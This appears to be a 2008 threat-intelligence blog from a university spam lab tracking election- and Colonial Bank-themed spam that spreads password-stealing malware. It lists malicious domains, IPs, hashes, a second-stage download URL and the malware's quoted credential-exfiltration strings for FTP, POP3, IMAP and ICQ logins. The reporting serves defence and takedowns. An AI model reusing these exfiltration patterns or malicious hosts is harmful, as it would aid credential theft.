Election Malware: Round Three


We made contact over the weekend with a real live human at Bizcn.com, who terminated all the domains listed above. Unfortunately, the spammer created new ones and this morning (10NOV08) at 7:52 AM we began to see his latest round of spam. In the first three hours of this spam campaign, the spam is evenly split between three domains created last night:

- miteodemo.com
- oirerbio.com
- demovideons.com

All three domains use the nameserver ns1.vistausan.com, which was also freshly registered last night at bizcn.com.

Computers which are currently hosting proxy redirectors for the domains above also provided redirection services for some of the "Round two" domain names. Some examples currently hosting would be:

118.219.111.107
190.47.161.2
221.184.68.214
89.36.135.102
91.90.229.209

But these are "fluxing" - they will change over the course of the hours as we wait for bizcn.com to shut down these newest domains and their nameserver domain. The shutdown request, in Chinese and English, was sent just now (10:40 AM Central Time)

Barack Sex Video malware


The only other piece of malware we are seeing delivered via election headlines is a very well detected trojan claiming to be a Barack Obama sex video. The great majority of products detect this malware at VirusTotal.com.

The porn video attachment name we are seeing most often is "zeland-01.zip".

Michelle Obama's Name used in Pill Spam


Why anyone would think that email recipients would buy Viagra after reading headlines like these is beyond my comprehension. Two heavily spammed subjects today used to sell Canadian Pharmacy pills are tied to Michelle Obama's name.

All of these 20 domain names were seen advertised in spam using the subject "Bush kills Michelle Obama":

bxoaxcs.cn
cpknetj.cn
cvmovzf.cn
fihithm.cn
hddbzqq.cn
imvbokv.cn
ixwewyi.cn
kycsgsf.cn
lrlbbgf.cn
pagegim.cn
ppnbokc.cn
rornzxl.cn
rzbopdh.cn
rzrsaak.cn
szosojb.cn
teqixyb.cn
ticewyt.cn
umcaxtx.cn
wjqsclb.cn
wplbhdi.cn

These 26 domains names were all used in spam with the subject line "Michelle Obama nude":

aojeyer.cn
cnrogvy.cn
dlyumlv.cn
dvrujfi.cn
fqosaeq.cn
gohbrtf.cn
iemokpg.cn
ihyefos.cn
ixwewyi.cn
kuxulne.cn
kxhoyed.cn
kzinwkm.cn
mmaagwd.cn
oaleqte.cn
ocbibxf.cn
rnjonlg.cn
rzrsaak.cn
sujidbk.cn
syootqj.cn
tomnhac.cn
uqpnjrn.cn
uwkajlr.cn
wjqsclb.cn
xyynwye.cn
zgmnvfe.cn
zyuunvw.cn

Each of those domain names actually forwards to another domain name when visited, which sells Canadian Pharmacy pills. Spammers use this technique to remove their spam from website orders from the domains they control, because some affiliate programs actually do refuse payment from those who can be shown to be spamming. By using this forwarding technique, spammers can claim their domains were NOT used in spam messages.

Friday, November 07, 2008

Election Malware Targets Sore Losers - McCain Video Loads Virus

We reported on Wednesday morning that Obama's historic victory was being used by cyber criminals in a spam campaign which attempted to trick email readers into watching a video of Obama's acceptance speech. Clicking the email link took readers to a website which seemed to have a video, but which prompted users to install "Adobe_Flash9.exe", which was not a video player upgrade, but actually a computer virus.

Today the spammer's have decided to take a more negative spin on their spam campaign. While "round one" of the malware seemed to try to appeal to those who were happy that Obama had won, "round two" is trying to trick the Haters into infecting themselves. More than 450 emails have already been received at the UAB Spam Data Mine with such negative subject lines as these:

Barack Obama can lost presidents chair
Barack Obama can lost President's Chair
Barack Obama in Danger - McCain will fight for president post
Barack Obama president resignation - 23/7 News
From Billy Mccain
IMPEACH Barrack Obama | USA government news
McCain Lawmakers Impeach Obama
McCain Lawyers Want to Stop Obama
McCain said today: 'Impeach Obama'
McCain strike against Obama political way
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Moms who voted for Obama
Obama faces impeachment
Obama Impeachment Resources: McCain Look at the Impeachment Process
Obama vs McCain 'Political Strike' May Undermine Labor Group
Scandal: Obama Resignation Letter
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections John McCain will defeat Barack Obama
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections Why McCain Will Win
The Impeachment of new president Obama
Video: Obama post-resignation speech
Why MccAin Want to Stop Obama From president vacancy?
WScandal: Re-elections hich John McCain will show up to debate?


The website looks like this: (Click the image for a larger version)




As before, the domain names are all newly registered with in China with the Registrar Bizcn.com. The domain names now are:

baraokl.com
oritrsunwart.com
preibrsu.com
serensy.com

Visiting any of the webpages will cause the same "pop-up" which claims that an update is needed to the "Adobe Media Player". Its NOT the same executable that was being used Wednesday morning, but a "re-packing" of the same malware. In other words, it does the same thing, but its still going to need new anti-virus signatures to detect it.

The virus this time around is

File size: 25173 bytes
MD5...: 642a588272e9fe723fb2f1dd8fccede5

Here's a link to the VirusTotal report which shows 22 of 36 AV products currently detect this version of the malware.

Students studying computer forensics at UAB have analyzed this version of the malware and confirmed that the stolen data is sent to the same Ukrainian computer address as the original Obama acceptance speech video and the recent Colonial Bank Digital Certificate malware, 91.203.93.57.

We've sent a request for cooperation for shutdown to the abuse address of record for that IP, abuse@uatelecom.com.ua (good luck, right?)

The malware is hidden on the computer with the name: \9129837.exe and invoked whenever Internet Explorer is active on the computer.

Stolen userids and passwords are sent to the Ukrainian computer using strings that follow this pattern:

http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x
URL: sniffer_ftp_%s
ftp_server=%s&ftp_login=%s&ftp_pass=%s&version=%lu
URL: sniffer_pop3_%s
pop3_server=%s&pop3_login=%s&pop3_pass=%s
URL: sniffer_imap_%s
imap_server=%s&imap_login=%s&imap_pass=%s
URL: sniffer_icq_%s
icq_user=%s&icq_pass=%s

The packer used to make it more difficult to analyze the malware is called "FSG".

Bottom line - don't click on links in email. If you DID click on this link, you need very badly to check out your computer for potential malware.

Thursday, November 06, 2008

Yesterday's Obama Spammer Now Imitates Colonial Bank

In yesterday's blog, we talked about Obama spam spreading a virus. In that attack there were five domain names, all registered in China on Bizcn.com, being used to download a computer program which would steal your passwords and send them to criminals.

Today we have a new spam campaign which uses five domain names, all registered in China on Bizcn.com, being used to download a computer program which would steal your passwords and send them to criminals.

Both of the groups of five domains used a nameserver which was located on the IP address 69.162.111.11 (which is in Dallas, Texas).

When you visited the webpage yesterday, a pop up box asked you to download a video player. Today when you visit one of the Colonial webpages, a pop up box asks you to download a digital certificate.

Yesterday we received over 500 copies of the Obama spam with various subjects.

Today we've received over 300 copies of the Colonial Bank spam with subjects including:Colonial Bank - authorized users performing appropriate functions
Colonial Bank Warning: services specific high-risk geographical areas.
Colonial Bank - Display of Information
Colonial Bank Warning: system disables passwords that haven't been used by a customer in 90 days.
Colonial Bank Warning: subject to monitoring and validation for authenticity and appropriateness.
Colonial Bank Treasury Services
Colonial Bank Warning: terminate your Internet banking session
Colonial Bank Warning: Electronic requests received over the Internet
Colonial Bank has developed an update for log in page
Colonial Bank also provides extensive information regarding identity theft prevention
Colonial Bank would like to announce latest update
Colonial Bank Warning: access the Bank's servers.
Colonial Bank Warning: software designed to protect against inappropriate requests.
Colonial Bank security # latest patches and updates installation.
Colonial Bank recommend that you use fraud prevention procedures
Colonial Bank Update.
Colonial Bank - Network Security and Monitoring
Colonial Bank - your password will never be displayed on your computer screen
Colonial Bank Warning: retrieving web pages or sending inquiries
Colonial Bank security # Ensure that your operating system has all latest patches and updates installed.
Colonial Bank Alert: SERVER UPDATE.
Colonial Bank recommend that you use security update
Colonial Bank - data sent over the encrypted connection has been altered in transit.
Colonial Bank has developed a Fraud Prevention Checklist
Colonial Bank recommend to review your account security
Colonial Bank Security and Identity Protection Newsletter
Colonial Bank Warning: prevent access to online banking from an IP network
Colonial Bank has developed special file protection
Colonial Bank Warning: ur Internet banking system encrypts stored password files
Colonial Bank Commercial Customer Service
Colonial Bank has developed new free protection tool
Colonial Bank - all information sent between a client and a server encrypted
Colonial Bank Warning: initial registration
Colonial Bank would like to inform you security updates
Colonial Bank security # Ensure that your operating system updated.
Colonial Bank Alert - Update.
Colonial Bank has developed a new 128 bit sofware
Colonial Bank security # apply updates
Colonial Bank - providing a high degree of confidentiality.
Colonial Bank News - security development
Colonial Bank - effort to limit access to its servers
Colonial Bank Java Update Includes Security Fixes - Security Fix.
Colonial Bank Warning: using the Secure Sockets Layer (SSL) protocol.
Colonial Bank Customer Warning.
UPDATE ALERT CONFIGURATION Colonial Bank.
Colonial Bank - Secure Data Transfer
Colonial Bank would like to inform you
Colonial Bank - the user and the server are in a secure environment.
Colonial Bank would like to inform you lates development
Colonial Bank Online server update.
Colonial Bank Warning: Your Password, and certain other private information
Colonial Bank has developed new anti-Fraud feature
Colonial Bank Update Alert.
Colonial Bank Security Response Center (MSRC) : UPDATE.
Colonial Bank Warning: termination of Inactive Connections
Colonial Bank Emergency Alert System.
Colonial Bank Connection Security
Colonial Bank upgrade warning.
Colonial Bank Warning: allowing only the traffic that is necessary to send acceptable data requests
Colonial Bank Warning: if you are not actively using the system.
Colonial Bank Warning: this is accomplished by filtering Internet traffic
Colonial Bank Update - News.
Colonial Bank would like to stop fraud practice
Colonial Bank - these actions may include the implementation of restrictions
Colonial Bank - Data traveling between the user and the server is encrypted
Colonial Bank Warning: suspicious or potentially harmful activity
Colonial Bank Time Warner Security - Customer Service.
Colonial Bank Installation and Upgrade Warning.
Server Update Services Colonial Bank.
Colonial Bank has developed serious protection
Colonial Bank Urgent Customer Alert: "Joomla!" Security Update.
Colonial Bank - Other Security Measures
Colonial Bank WindowsXP/2000 customers Attention!
Colonial Bank - Security Fix.
Colonial Bank Warning: the sending software
Colonial Bank Guards and Protects Your Information
Colonial Bank would like to make you aware of online fraud
Colonial Bank - Our Internet banking system
Colonial Bank Security
Colonial Bank - an encrypted SSL connection required
Colonial Bank is committed to providing you with a convenient, safe and secure online banking
Colonial Bank Warning: we also monitor Internet traffic
Colonial Bank - takes several measures.
Visit a Colonial Bank Financial Center
Colonial Bank Services
Colonial Bank Warning: Electronic requests are filtered through a combination of computer hardware and software
Colonial Bank would like to open new security features
Colonial Bank Warning: automatically determining
Colonial Bank - an encrypted SSL connection is equipped with a mechanism for detecting tampering
Colonial Bank recommend that you use updated browser
Colonial Bank recommend that you use 128 bit file
Colonial Bank Regular Update Alert.
Colonial Bank Customer Support - Security Updates.

Here is today's webpage:



The domain names used today are:

coloneldi.com/security.php
gdieuntso.com/security.php
porentud.com/security.php
reteinr.com/security.php
rutriyn.com/security.php

Each of these domains was registered today (November 6, 2008) on Bizcn.com.

Visiting the Colonial pages above drops ColonialSETUP.exe

VirusTotal (17/36)

http://www.virustotal.com/analisis/9dfd058ab879365aa719e4a0055b2b46

File size: 3369 bytes

MD5...: 60e39dd91cd4676c70d4ee844eb5a6c7

The phase one malware makes connection to the following URL to download
the phase two malware:

chload.com/u1.exe

chload.com was registered TODAY on Register.com

the nameserver for chload.com is ns1.ldern.com

That is also the nameserver for:

customlod.com
upgradell.com
solecokes.com
lodnew.com

which have all ALSO been used to download Phase Two malware for Digital
Certificate spam.

The second phase malware (u1.exe) was also analyzed by VirusTotal.

http://www.virustotal.com/analisis/a0c5718489e7022da2f5bf35ef03adc8

It showed a 21/36 detection rate:
File size: 25161 bytes
MD5...: 6a1e70482b86500229ebdc99b13792ba

u1.exe installs itself as "comctl32.dll" and includes root kit and
keylogging technology. I have not had a chance yet to see where the
keylogged data is sent.

A request to terminate chload.com and ldern.com has been sent to
register.com.

A request to terminate the following domains has been sent to bizcn.com.

coloneldi.com
gdieuntso.com
porentud.com
reteinr.com
rutriyn.com